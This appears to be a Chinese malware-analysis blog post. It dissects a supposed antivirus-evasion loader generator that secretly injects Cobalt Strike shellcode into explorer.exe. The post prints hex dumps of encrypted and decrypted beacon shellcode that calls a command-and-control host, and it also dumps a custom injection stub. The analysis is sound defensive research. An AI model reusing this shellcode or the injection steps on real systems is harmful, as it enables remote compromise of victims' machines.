所谓免杀生成器自带免杀马-分析

admin
admin
admin
138876
文章
114
评论
2024年6月13日13:19:39评论24 views字数 9106阅读30分21秒阅读模式

 

0x01 文件信息
 

所谓免杀生成器自带免杀马-分析
提取到的有两个文件,分别是LoaderMaker.exe 与ShellcodeLoader.exe

所谓免杀生成器自带免杀马-分析

所谓免杀生成器自带免杀马-分析

ShellcodeLoader.exe文件的一些信息

所谓免杀生成器自带免杀马-分析

所谓免杀生成器自带免杀马-分析
LoaderMaker.exe文件相关信息,是一个32位程序没有壳

0x00 文件分析

 

不说开干

所谓免杀生成器自带免杀马-分析
首先进入main函数

所谓免杀生成器自带免杀马-分析

先打印一个title

所谓免杀生成器自带免杀马-分析
功能参数

块截图

所谓免杀生成器自带免杀马-分析

sub_4011e0分析

所谓免杀生成器自带免杀马-分析

BOOL PfxInitialize(  PFXHANDLE          *phPfx,  CRYPT_DATA_BLOB    *pPfx,  LPCWSTR            szPassword,  DWORD              dwFlags);要根据具体情况检查函数的返回值,并根据需要处理错误情况。

所谓免杀生成器自带免杀马-分析
拿到的值是0x200,暂时不知PfxInitialize有说明作用,猜测是反沙箱

sub_401620分析

所谓免杀生成器自带免杀马-分析

就是一个进程debug特权提升

sub_401030分析

所谓免杀生成器自带免杀马-分析
读取传如的文件文件返回大小,然后进行加密

所谓免杀生成器自带免杀马-分析

最后生成马

反转!!!!!!

所谓免杀生成器自带免杀马-分析

当再次查看导入函数是发现了遍历进程的函数,脑瓜子嗡嗡的

所谓免杀生成器自带免杀马-分析

发现它遍历进程,拿到对应的进程pid

所谓免杀生成器自带免杀马-分析

所谓免杀生成器自带免杀马-分析

经过不断的溯源,居然发现之前认为的printf函数另有隐情,发现它多调用了一个函数sub_401930
继续跟进sub_401930->sub_401910->sub_4018f0->sub_4018d0->sub_4018b0->sub401890->sub_401870->sub_401850->sub_401830->sub_401800->sub_401710

sub_401800分析

所谓免杀生成器自带免杀马-分析

在这函数中发现,需要调用7次后才会调用sub_401710

sub_401710分析

所谓免杀生成器自带免杀马-分析

sub_401560分析

所谓免杀生成器自带免杀马-分析

所谓免杀生成器自带免杀马-分析

通过动态与静态结合调试发现,它拿的explorer.exe的进程pid

块截图

所谓免杀生成器自带免杀马-分析

所谓免杀生成器自带免杀马-分析

所谓免杀生成器自带免杀马-分析

所谓免杀生成器自带免杀马-分析

获取kerner32的句柄

所谓免杀生成器自带免杀马-分析

遍历拿到explorer.exe 的pid

所谓免杀生成器自带免杀马-分析通过GetprocAddress获取VirtualAllocEx的地址

所谓免杀生成器自带免杀马-分析获取WriteProcessMemory函数的地址

所谓免杀生成器自带免杀马-分析

014C05C8  FD 4A 82 E8 F5 EE CF 08 09 0A 4C 5B 4E 5E 5D 5F  ýJ.èõîÏ...L[N^]_  014C05D8  47 5A 24 C2 72 5E 9E 46 79 52 92 4A 05 56 96 4E  GZ$Âr^.FyR.J.V.N  014C05E8  01 6A AA 52 75 6E 2A 91 63 64 68 1B E6 66 20 F0  .jªRun*.cdh.æf ð  014C05F8  9D 0E 54 50 37 1A 17 77 FA F1 38 7B 3E FD DD D3  ..TP7..wúñ8{>ýÝÓ  014C0608  13 01 14 0C D0 18 67 CD 0B 76 03 4B 9D 2C D0 38  ....Ð.gÍ.v.K.,Ð8  014C0618  49 5B 51 27 27 DF D7 E0 59 5A 5B 14 DA 9E 2B 39  I[Q''ß×àYZ[.Ú.+9  014C0628  29 61 B3 34 F0 2E 7F 24 E4 2A 4B 23 6E BE 8E 3A  )a³4ð..$ä*K#n¾.:  014C0638  39 8F BC 33 00 42 FF 40 7A B0 38 4B B6 36 50 C0  9.¼3.Bÿ@z°8K¶6PÀ  014C0648  2D C1 44 4B 8A C5 88 47 B1 6A 00 7B C1 8F C3 AC  -ÁDK.Å.G±j.{Á.ì  014C0658  99 D5 AC 43 E2 4E CF D4 14 DA BF D3 9E 4E F9 DF  .Õ¬CâNÏÔ.Ú¿Ó.Nùß  014C0668  2C AE EB E8 30 E6 BB EF AA 7A EC 21 A9 26 E7 AF  ,®ëè0æ»ïªzì!©&ç¯  014C0678  61 F1 EB F3 ED EC F0 EE FA E2 FC E3 FE E8 F7 3D  añëóíìðîúâüãþè÷=  014C0688  2D E2 84 92 3C 26 9F 87 92 94 83 41 DF 25 82 31  -â..<&.....Aß%.1  014C0698  30 2F 90 BA D5 9D 69 A1 B2 B8 B4 B6 BA AA DF 9F  0/.ºÕ.i¡²¸´¶ºªß.  014C06A8  B7 A9 6C 06 A9 6D 18 A7 53 A6 9E CE EC 13 3C A8  ·©l.©m.§S¦.Îì.<¨  014C06B8  C2 39 BB C3 27 B9 C8 38 B6 C9 34 BB AD BD AF BF  Â9»Ã'¹È8¶É4».½¯¿  014C06C8  BB 3C 55 7B A4 FB D4 EF 9C 0A 0B 0C 57 46 88 CF  »<U{¤ûÔï....WF.Ï  014C06D8  52 AA 36 1C 15 16 5C 27 D2 59 4C 5B 4E 78 1E 5F  Rª6...'ÒYL[Nx._  014C06E8  72 61 99 75 AE BB E1 D9 FE C3 54 71 65 A5 F0 68  ra.u®»áÙþÃTqe¥ðh  014C06F8  02 E4 7C BB ED 79 08 FF 6B 52 3B 0A FD BA 6D 6E  .ä|»íy.ÿkR;.ýºmn  014C0708  02 FC AA 17 6B 7F BA 93 01 C1 8D 04 D0 8F 1F 26  .üª.k.º..Á..Ð..&  014C0718  5B 0F 1B DB A6 F0 4A 58 59 5A 31 5C 35 DE 6E 60  [..Û¦ðJXYZ15Þn`  014C0728  61 29 EC 84 26 DD 63 68 69 6A 2C D2 1A 2C F1 EA  a)ì.&Ýchij,Ò.,ñê  014C0738  90 A5 3B FB 86 3E 00 AE 32 BF BB 85 84 83 82 33  .¥;û.>.®2¿»....3  014C0748  B2 49 D1 D2 C6 40 AC 82 91 F3 76 5F 0A 4E 82 0B  ²IÑÒÆ@¬..óv_.N..  014C0758  0E 91 93 94 DD 6B 5A 99 1D 16 9C 9C 9D 77 2E 77  ....ÝkZ......w.w  014C0768  45 A1 A3 A4 4D 28 5A 59 58 87 C8 CB DD DF 82 C1  E¡£¤M(ZYX.ÈËÝß.Á  014C0778  C7 D5 C1 E0 D6 CD F5 D2 C9 CC BB 83 D2 39 5A D5  ÇÕÁàÖÍõÒÉÌ».Ò9ZÕ  014C0788  A6 19 85 92 80 18 86 CA 2B A9 B5 F6 41 8E 5E 3E  ¦......Ê+©µöA.^>  014C0798  90 98 34 5F A4 2E 7E 4F 4E 82 8E D8 B4 A5 3D 1F  ..4_¤.~ON..Ø´¥=.  014C07A8  B8 D9 71 3C 09 0B 3F 21 AC EA 68 5B 08 64 F0 66  ¸Ùq<..?!¬êh[.dðf  014C07B8  94 08 F0 9C 1B 94 02 E0 F9 B2 96 89 89 C8 DF 89  ..ð....àù²...Èß.  014C07C8  78 77 31 2E 6F 75 74 63 7B 71 25 63 63 67 04 06  xw1.outc{q%ccg..  014C07D8  52 73 72 77 65 62 2D 38 33 37 31 17 17 5D 7E 7D  Rsrweb-8371..]~}  014C07E8  46 52 57 0F 69 45 49 41 5E 49 4E 4F 17 0E 4C 42  FRW.iEIA^INO..LB  014C07F8  1E 65 62 20 52 5C 0E 47 06 0A 15 0F 32 38 7E 51  .eb R.G....28~Q  014C0808  2F 30 28 21 31 2D 2A 2A 73 6A 2A 28 24 3F 2C 43  /0(!1-**sj*($?,C  014C0818  5B 05 22 37 27 79 18 31 3E 38 2F 62 7D 11 32 26  [."7'y.1>8/b}.2&  014C0828  0A 0E 0F 03 4C 51 49 58 49 42 0A 05 02 1E 10 1C  ....LQIXIB......  014C0838  1A 14 1F 17 50 56 3C 25 32 3D 5B 43 53 4E 46 60  ....PV<%2=[CSNF`  014C0848  D8 E9 ED E8 EC F3 F6 A8 C7 DE AB BE A3 BD B6 B0  Øéíèìóö¨ÇÞ«¾£½¶°  014C0858  C8 DF C6 A6 A1 AF B7 C4 EB F1 FF FF F3 EA B2 AB  ÈßƦ¡¯·Äëñÿÿó겫  014C0868  8F 92 9A 84 EA E5 E8 F3 82 A5 A1 AC F5 FE EE B5  ....êåèó.¥¡¬õþîµ  014C0878  F6 81 41 18 07 3A 78 D2 52 10 3E 34 E1 17 D6 B6  ö.A..:xÒR.>4á.Ö¶  014C0888  26 B6 20 95 96 82 FE A3 7C 70 FA 1B 0B CE 38 43  &¶ ...þ£|pú..Î8C  014C0898  54 15 2D B0 AE 8A 1C 90 B4 AB D0 B7 C8 97 C2 F2  T.-°®...´«Ð·È.Âò  014C08A8  B8 19 30 FD 2F A6 2B BF FC B1 6E BC E6 42 AE 93  ¸.0ý/¦+¿ü±n¼æB®.  014C08B8  03 7F C2 6A 05 C7 DC 46 7F 9B 29 D7 E7 CA E0 1F  ..Âj.ÇÜF..)×çÊà.  014C08C8  0F B7 3B 79 94 2B 06 A8 00 0B B6 65 5A E2 78 29  .·;y.+.¨..¶eZâx)  014C08D8  8C DA 28 26 3E 03 A5 69 B8 A1 F9 2E A0 84 92 0D  .Ú(&>.¥i¸¡ù. ...  014C08E8  5D 05 33 16 C4 EB 1B 3D 29 69 95 DC 9A 90 79 D1  ].3.Äë.=)i.Ü..yÑ  014C08F8  E6 7A 04 FB 8F 36 37 78 39 79 83 3C 2D 3E 3F 7F  æz.û.67x9y.<->?.  014C0908  FA 02 43 44 45 05 FD 20 ED 1B B0 B5 9A 06 DE 1D  ú.CDE.ý í.°µ..Þ.  014C0918  04 1A DC B5 1D DD A8 20 D2 84 1C E4 5D 7E 5F 60  ..ܵ.ݨ Ò..ä]~_`  014C0928  2A E9 9C 23 DF 78 F1 EF 8B 97 C0 24 F0 AA 4F EB  *é.#ßxñï..À$ðªOë  014C0938  B1 06 C5 16 00 73 3F 77 BC FD BB 0F AC 26 27 28  ±.Å..s?w¼ý».¬&'(  014C0948  C9 85 83 84 85 86 D7 45 61 F7 78 75 74 FB FA F9  É.....×Ea÷xutûúù  014C0958  A3 C0 F9 E3 E2 F1 E5 EF B7 F1 F5 F1 9D 85 F8 40  £Àùãâñåï·ñõñ..ø@  014C0968  2E AB AB AB AB AB AB AB AB 00 00 00 00 00 00 00  .««««««««.......  014C0978  00 00 00 00 00 00 00 00 6E 8A 5F 8B 4E E6 00 00  ........n._.Næ..  014C0988  C0 00 4C 01 C0 00 4C 01 EE FE EE FE EE FE EE FE  À.L.À.L.îþîþîþîþ

拿到加密的shellcode-cs

所谓免杀生成器自带免杀马-分析

014C05C8  FC 48 83 E4 F0 E8 C8 00 00 00 41 51 41 50 52 51  üH.äðèÈ...AQAPRQ  014C05D8  56 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52  VH1ÒeH.R`H.R.H.R  014C05E8  20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0   H.rPH.·JJM1ÉH1À  014C05F8  AC 3C 61 7C 02 2C 20 41 C1 C9 0D 41 01 C1 E2 ED  ¬<a|., AÁÉ.A.Áâí  014C0608  52 41 51 48 8B 52 20 8B 42 3C 48 01 D0 66 81 78  RAQH.R .B<H.Ðf.x  014C0618  18 0B 02 75 72 8B 80 88 00 00 00 48 85 C0 74 67  ...ur......H.Àtg  014C0628  48 01 D0 50 8B 48 18 44 8B 40 20 49 01 D0 E3 56  H.ÐP.H.D.@ I.ÐãV  014C0638  48 FF C9 41 8B 34 88 48 01 D6 4D 31 C9 48 31 C0  HÿÉA.4.H.ÖM1ÉH1À  014C0648  AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24  ¬AÁÉ.A.Á8àuñL.L$  014C0658  08 45 39 D1 75 D8 58 44 8B 40 24 49 01 D0 66 41  .E9ÑuØXD.@$I.ÐfA  014C0668  8B 0C 48 44 8B 40 1C 49 01 D0 41 8B 04 88 48 01  [email protected].ÐA...H.  014C0678  D0 41 58 41 58 5E 59 5A 41 58 41 59 41 5A 48 83  ÐAXAX^YZAXAYAZH.  014C0688  EC 20 41 52 FF E0 58 41 59 5A 48 8B 12 E9 4F FF  ì ARÿàXAYZH..éOÿ  014C0698  FF FF 5D 6A 00 49 BE 77 69 6E 69 6E 65 74 00 41  ÿÿ]j.I¾wininet.A  014C06A8  56 49 89 E6 4C 89 F1 41 BA 4C 77 26 07 FF D5 48  VI.æL.ñAºLw&.ÿÕH  014C06B8  31 C9 48 31 D2 4D 31 C0 4D 31 C9 41 50 41 50 41  1ÉH1ÒM1ÀM1ÉAPAPA  014C06C8  BA 3A 56 79 A7 FF D5 E9 93 00 00 00 5A 48 89 C1  º:Vy§ÿÕé....ZH.Á  014C06D8  41 B8 27 08 00 00 4D 31 C9 41 51 41 51 6A 03 41  A¸'...M1ÉAQAQj.A  014C06E8  51 41 BA 57 89 9F C6 FF D5 EB 79 5B 48 89 C1 48  QAºW..ÆÿÕëy[H.ÁH  014C06F8  31 D2 49 89 D8 4D 31 C9 52 68 00 32 C0 84 52 52  1ÒI.ØM1ÉRh.2À.RR  014C0708  41 BA EB 55 2E 3B FF D5 48 89 C6 48 83 C3 50 6A  AºëU.;ÿÕH.ÆH.ÃPj  014C0718  0A 5F 48 89 F1 BA 1F 00 00 00 6A 00 68 80 33 00  ._H.ñº....j.h.3.  014C0728  00 49 89 E0 41 B9 04 00 00 00 41 BA 75 46 9E 86  .I.àA¹....AºuF..  014C0738  FF D5 48 89 F1 48 89 DA 49 C7 C0 FF FF FF FF 4D  ÿÕH.ñH.ÚIÇÀÿÿÿÿM  014C0748  31 C9 52 52 41 BA 2D 06 18 7B FF D5 85 C0 0F 85  1ÉRRAº-..{ÿÕ.À..  014C0758  9D 01 00 00 48 FF CF 0F 84 8C 01 00 00 EB B3 E9  ....HÿÏ......ë³é  014C0768  E4 01 00 00 E8 82 FF FF FF 2F 6D 61 70 73 2F 6F  ä...è.ÿÿÿ/maps/o  014C0778  76 65 72 6C 61 79 42 66 70 72 00 39 6D 85 E7 6B  verlayBfpr.9m.çk  014C0788  65 D9 46 52 BB D2 43 0E E2 61 7E 3E 8C 40 93 F2  eÙFR»ÒC.âa~>.@.ò  014C0798  5F 46 E1 8D 77 F8 AB 99 95 58 57 0C 6F 79 E2 C1  _Fá.wø«..XW.oyâÁ  014C07A8  57 39 92 D8 EC EF D8 C7 43 00 8D B1 EB 8E 01 8A  W9.ØìïØÇC..±ë...  014C07B8  63 F6 1D 68 EE 66 F7 28 00 48 6F 73 74 3A 20 77  cö.hîf÷(.Host: w  014C07C8  77 77 32 2E 6A 71 75 65 72 79 2E 69 6E 6B 0D 0A  ww2.jquery.ink..  014C07D8  41 63 63 65 70 74 3A 20 2A 2F 2A 0D 0A 41 63 63  Accept: */*..Acc  014C07E8  65 70 74 2D 4C 61 6E 67 75 61 67 65 3A 20 65 6E  ept-Language: en  014C07F8  2D 55 53 2C 65 6E 3B 71 3D 30 2E 35 0D 0A 43 6F  -US,en;q=0.5..Co  014C0808  6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D  nnection: close.  014C0818  0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A  .User-Agent: Moz  014C0828  69 6C 6C 61 2F 35 2E 30 20 28 63 6F 6D 70 61 74  illa/5.0 (compat  014C0838  69 62 6C 65 3B 20 4D 53 49 45 20 39 2E 30 3B 20  ible; MSIE 9.0;   014C0848  57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20  Windows NT 6.1;   014C0858  57 4F 57 36 34 3B 20 54 72 69 64 65 6E 74 2F 35  WOW64; Trident/5  014C0868  2E 30 3B 20 4D 41 41 55 29 0D 0A 00 58 50 43 1B  .0; MAAU)...XPC.  014C0878  45 31 F2 A4 B2 8C C1 66 E9 B6 87 88 5C AB 6B 0A  E1ò¤².Áfé¶..«k.  014C0888  E5 74 DD 57 51 44 3B 65 B3 A6 33 D1 C6 00 F9 8D  åtÝWQD;e³¦3ÑÆ.ù.  014C0898  83 C5 FE 7C 79 5C CD 58 6B 73 15 6D 1B 4B 1F 2E  .Åþ|yÍXks.m.K..  014C08A8  57 F9 CD 1F CA 40 CC 59 13 59 87 50 09 AC 43 7D  WùÍ.Ê@ÌY.Y.P.¬C}  014C08B8  F2 8F 33 9A F0 33 2D B2 86 63 D2 2D 1A 34 21 E1  ò.3.ð3-².cÒ-.4!á  014C08C8  0E B7 38 7B 97 2F 03 A0 F7 03 BF 6F 55 EC 79 27  .·8{./. ÷.¿oUìy'  014C08D8  9B C8 35 36 29 17 B2 7F AF B9 E2 36 83 9E 8F 13  .È56).².¯¹â6....  014C08E8  7C 25 10 36 E7 CF 3C 1B 00 41 BE F0 B5 A2 56 FF  |%.6çÏ<..A¾ðµ¢Vÿ  014C08F8  D5 48 31 C9 BA 00 00 40 00 41 B8 00 10 00 00 41  ÕH1ɺ[email protected]¸....A  014C0908  B9 40 00 00 00 41 BA 58 A4 53 E5 FF D5 48 93 53  ¹@...AºX¤SåÿÕH.S  014C0918  53 48 89 E7 48 89 F1 48 89 DA 41 B8 00 20 00 00  SH.çH.ñH.ÚA¸. ..  014C0928  49 89 F9 41 BA 12 96 89 E2 FF D5 48 83 C4 20 85  I.ùAº...âÿÕH.Ä .  014C0938  C0 74 B6 66 8B 07 48 01 C3 85 C0 75 D7 58 58 58  Àt¶f..H.Ã.Àu×XXX  014C0948  48 05 00 00 00 00 50 C3 E8 7F FD FF FF 77 77 77  H.....PÃè.ýÿÿwww  014C0958  32 2E 6A 71 75 65 72 79 2E 69 6E 6B 00 19 69 A0  2.jquery.ink..i   014C0968  8D AB AB AB AB AB AB AB AB 00 00 00 00 00 00 00  .««««««««.......  014C0978  00 00 00 00 00 00 00 00 6E 8A 5F 8B 4E E6 00 00  ........n._.Næ..  014C0988  C0 00 4C 01 C0 00 4C 01 EE FE EE FE EE FE EE FE  À.L.À.L.îþîþîþîþ  014C0998  EE FE EE FE EE FE EE FE EE FE EE FE EE FE EE FE  îþîþîþîþîþîþîþîþ

然后拿到解密后的shellcode-cs

所谓免杀生成器自带免杀马-分析分配了一块内存

所谓免杀生成器自带免杀马-分析

把自己的shellcode复制过去

所谓免杀生成器自带免杀马-分析然后并执行它,调试的时候报错了,因该是加载explorer中shellcode的一段自己写的shellcode

01DF05C8  53 56 57 55 53 5B E8 78 00 00 00 53 5B 85 C0 74  SVWUS[èx...S[.Àt  01DF05D8  67 48 89 E6 48 83 E4 F0 48 83 EC 68 B8 FA 80 39  gH.æH.äðH.ìh¸ú.9  01DF05E8  5E 53 5B E8 86 00 00 00 48 89 C3 4D 31 C0 48 31  ^S[è....H.ÃM1ÀH1  01DF05F8  C0 48 89 44 24 50 53 5B 48 89 44 24 48 48 89 44  ÀH.D$PS[H.D$HH.D  01DF0608  24 40 48 89 44 24 38 53 5B 48 89 44 24 30 8B 46  [email protected]$8S[H.D$0.F  01DF0618  24 48 89 44 24 28 8B 46 20 48 89 44 24 20 53 5B  $H.D$(.F H.D$ S[  01DF0628  44 8B 4E 14 BA 00 00 00 10 8B 4E 30 53 5B FF D3  D.N.º.....N0S[ÿÓ  01DF0638  48 89 F4 E8 1C 00 00 00 5D 5F 5E 5B C3 31 C0 48  H.ôè....]_^[Ã1ÀH  01DF0648  F7 D8 C3 E8 F5 FF FF FF 74 07 58 6A 33 53 5B 50  ÷ØÃèõÿÿÿt.Xj3S[P  01DF0658  CB C3 53 5B E8 E4 FF FF FF 53 5B 75 10 58 83 EC  ËÃS[èäÿÿÿS[u.X.ì  01DF0668  08 89 04 24 C7 44 24 04 23 00 00 00 CB C3 56 57  ...$ÇD$.#...ËÃVW  01DF0678  53 51 49 89 C0 6A 60 5E 65 48 8B 06 48 8B 40 18  SQI.Àj`^eH..H.@.  01DF0688  53 5B 4C 8B 50 30 53 5B 49 8B 6A 10 48 85 ED 89  S[L.P0S[I.j.H.í.  01DF0698  E8 74 59 4D 8B 12 8B 45 3C 83 C0 10 8B 44 05 78  ètYM...E<.À..D.x  01DF06A8  53 5B 48 8D 74 05 18 AD 91 67 E3 DC AD 4C 8D 5C  S[H.t....gãÜ.L.  01DF06B8  05 00 53 5B AD 48 8D 7C 05 00 AD 48 8D 5C 05 00  ..S[.H.|...H...  01DF06C8  53 5B 8B 74 8F FC 48 01 EE 31 C0 99 AC 01 C2 C1  S[.t.üH.î1À.¬.ÂÁ  01DF06D8  C2 05 53 5B FF C8 79 F4 44 39 C2 E0 E5 75 AC 0F  Â.S[ÿÈyôD9Âàåu¬.  01DF06E8  B7 14 4B 53 5B 41 8B 04 93 48 01 E8 59 5B 5F 5E  ·.KS[A...H.èY[_^  01DF06F8  C3 AB AB AB AB AB AB AB AB 00 00 00 00 00 00 00  ë«««««««.......  01DF0708  00 00 00 00 00 00 00 00 D7 C3 7F 0E BC AD 00 00  ........×Ã..¼...  01DF0718  C0 00 DF 01 C0 00 DF 01 EE FE EE FE EE FE EE FE  À.ß.À.ß.îþîþîþîþ

自己的shellcode

整体流程截图

所谓免杀生成器自带免杀马-分析

通过以上分析已经可以拿到域名与端口,需要样本请进圈子领取!!

 

原文始发于微信公众号(实战安全研究):所谓免杀生成器自带免杀马-分析

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月13日13:19:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   所谓免杀生成器自带免杀马-分析https://cn-sec.com/archives/2842962.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息